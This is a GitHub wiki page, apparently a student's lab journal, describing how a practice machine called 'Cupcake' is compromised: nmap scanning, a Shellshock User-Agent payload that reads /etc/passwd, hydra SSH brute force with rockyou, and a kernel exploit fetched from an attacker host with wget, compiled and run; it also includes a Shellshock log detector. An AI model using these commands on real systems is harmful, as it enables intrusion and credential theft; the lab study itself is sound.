Exploiting Cupcake - samuel-richardson/Sam-Tech-Journal GitHub Wiki

Exploiting Cupcake

Active Recon

NMAP Scans

  • Scan the top 100 ports: nmap --top-ports 100 'ip'
  • OS and service version detection on the top 100 ports: nmap -O -sV --top-ports 100 'ip'
  • Get more information on a specific open port: nmap -A -p 'port' 'ip'
  • Write scan results to a greppable file: sudo nmap -sT -sV --top-ports 100 'ip' -Pn -oG 'outputfile'
  • Convert the scan output to CSV and copy it into a spreadsheet: nmaptocsv -i 'nmapscan' -d ','

Other

  • Use the service versions and releases reported by the scan to look up known vulnerabilities.
  • Check what the web server and the other open ports expose, and which of it is reachable without authentication.

Remote Code Execution

  • The exploit that is used can be found here
  • Shellshock: a bash function definition placed in a request header (such as User-Agent) is passed through the CGI environment and the trailing commands are executed.
  • Using nmap: sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo : echo : /bin/uname -a" 10.0.5.23
  • Using curl: curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status
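From the defender's side, the same header-based payload is easy to spot in web server logs. The following is an added example, not part of the original wiki page: it scans constructed combined-format access log lines for the Shellshock function-definition prefix in the User-Agent field and reports the request path hit.

```python
import re

# Constructed sample access-log lines (combined log format with User-Agent);
# these are made up for this example and are not from the original page.
SAMPLE_LOGS = [
    '10.0.5.99 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.5.99 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '10.0.5.99 - - [01/Jan/2024:10:00:07 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "() { :;}; /bin/uname -a"',
    '10.0.5.99 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

# Shellshock payloads begin with an exported bash function definition "() { ... }"
# followed by ";" and the commands to run; whitespace differs between variants.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')


def is_shellshock_header(value: str) -> bool:
    """Return True when a header value starts with a bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock_hits(log_lines):
    """Return (line_index, request_path, user_agent) for each log line whose
    quoted User-Agent field matches the Shellshock pattern."""
    hits = []
    for idx, line in enumerate(log_lines):
        # Quoted fields in combined log format are: request, referer, user-agent.
        fields = re.findall(r'"([^"]*)"', line)
        if len(fields) < 3:
            continue
        request, user_agent = fields[0], fields[2]
        path = request.split(' ')[1] if ' ' in request else request
        if is_shellshock_header(user_agent):
            hits.append((idx, path, user_agent))
    return hits


if __name__ == "__main__":
    for idx, path, ua in find_shellshock_hits(SAMPLE_LOGS):
        print(f"line {idx}: Shellshock pattern against {path}: {ua}")
```

Any hit against a path under /cgi-bin/ on a host running an unpatched bash is the case to triage first; patching bash removes the code path regardless of which header carries the payload.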

Password list and ssh bruteforce

  • Search the rockyou wordlist for passwords containing a username: grep -i 'username' /usr/share/wordlists/rockyou.txt
  • Use hydra to brute force ssh: hydra -l 'user' -p 'possible passwords' 'ip' -t 4 ssh

Root compromise

  • Use searchsploit to identify an exploit for the Linux kernel version: searchsploit Linux Kernel 2.6
  • Download the selected exploit: searchsploit -m 'exploitfile'
  • Start a Python web server to transfer files: python3 -m http.server 'port'
  • Download the file on the target machine: wget http://'attackermachine':'port'/'file'
  • Compile the C exploit with gcc: gcc 'file' -o 'output' (use -l to link any required libraries)
  • Run the exploit: ./'file'

Reflection

The techniques used to exploit Cupcake seemed straightforward to me. However, the research to identify the working vulnerabilities was the most confusing part. Exploits and commands are easy enough to run once they're found, but finding them seems to be the more difficult part. I suppose the thought process of finding the best exploits will come with time.